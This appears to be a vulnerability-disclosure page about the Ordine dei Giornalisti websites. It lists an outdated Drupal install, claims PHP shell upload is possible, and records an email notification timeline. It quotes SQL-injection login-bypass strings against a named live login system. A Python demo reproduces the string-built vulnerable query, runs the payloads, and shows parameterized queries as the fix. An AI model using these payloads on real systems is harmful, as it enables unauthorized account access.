Ordine dei Giornalisti - http://www.odg.it https://sigef-odg.lansystems.it - SQL injection, XSS, system compromise
http://www.odg.it
Old version of Drupal with several known security problems.
It is possible to obtain admin access and upload a PHP shell.
(2019-05: the problem is still there.)
https://sigef-odg.lansystems.it
Access as any user via SQL injection.
Sample injection
user: ' or ''='
password: ' or ''='
(2019-05: they tried to fix the problem; the previous injection no longer works.)
New injection
' or ''=''--
Sample screenshot (image not reproduced here)
Sample error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and `password`=SHA2('',256) AND IFNULL(UFPC.eliminato,0) NOT IN (1,8,9)' at line 1
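The error message above leaks the shape of the login query: the username and password are spliced straight into the SQL text, and the "fix" only wrapped the password in SHA2(). The following is an added example (not code from the page, odg.it or the sigef application) that reproduces that query shape against a constructed SQLite table, registers a stand-in SHA2() function, and shows why parameterized queries are the actual fix. The table name `users`, the column `eliminato` (written without the `UFPC` alias) and the test account are assumptions; the two payloads are the ones quoted on this page. Note that SQLite treats `--` as a comment to end of line, while MySQL's exact comment rules differ, so engine behaviour for a given payload varies; the remediation does not.

```python
import hashlib
import sqlite3

# Constructed sample data: one active account with a SHA-256 password hash.
SAMPLE_USER = "alice"
SAMPLE_PASSWORD = "correct horse"


def sha256_hex(value) -> str:
    """Hex SHA-256 of a value; stands in for MySQL's SHA2(x, 256)."""
    return hashlib.sha256(str(value).encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's user table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    # Register SHA2(text, bits) so the query text can mirror the page's error message.
    conn.create_function("SHA2", 2, lambda s, bits: sha256_hex(s))
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, eliminato INTEGER)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        (SAMPLE_USER, sha256_hex(SAMPLE_PASSWORD), 0),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str):
    """String-built query in the shape leaked by the error message.

    Hashing the password inside SQL changes nothing about the injection:
    the raw input still becomes part of the statement text.
    Returns the matched username, or None.
    """
    sql = (
        "SELECT username FROM users WHERE username='" + user + "'"
        " AND password=SHA2('" + password + "',256)"
        " AND IFNULL(eliminato,0) NOT IN (1,8,9)"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, user: str, password: str):
    """Same logic with bound parameters: input is data, never SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=?"
        " AND password=SHA2(?,256)"
        " AND IFNULL(eliminato,0) NOT IN (1,8,9)",
        (user, password),
    ).fetchone()
    return row[0] if row else None


# The two payloads quoted on this page.
PAYLOAD_OLD = "' or ''='"      # no longer works once SHA2() wraps the password
PAYLOAD_NEW = "' or ''=''--"   # comments out the rest of the WHERE clause


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, old payload:", login_vulnerable(db, PAYLOAD_OLD, PAYLOAD_OLD))
    print("vulnerable, new payload:", login_vulnerable(db, PAYLOAD_NEW, "x"))
    print("safe, new payload:      ", login_safe(db, PAYLOAD_NEW, "x"))
    print("safe, real credentials: ", login_safe(db, SAMPLE_USER, SAMPLE_PASSWORD))
```

Beyond parameterization, two further points a reviewer would raise from this page: the database error text is returned to the browser, which is how the query structure became visible in the first place (errors should be logged server-side and replaced with a generic message), and a failed fix attempt should be re-tested with the original reporter rather than assumed closed.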
NOTE: I have not saved/stored any kind of confidential information and I have no criminal intents of any kind.
---
2018-04 - odg.it has been notified twice of the problems via email. No reply received.
2018-06 - no reply received. The problems are still there.
2019-05-12 - no reply, but they tried to fix the problem on sigef.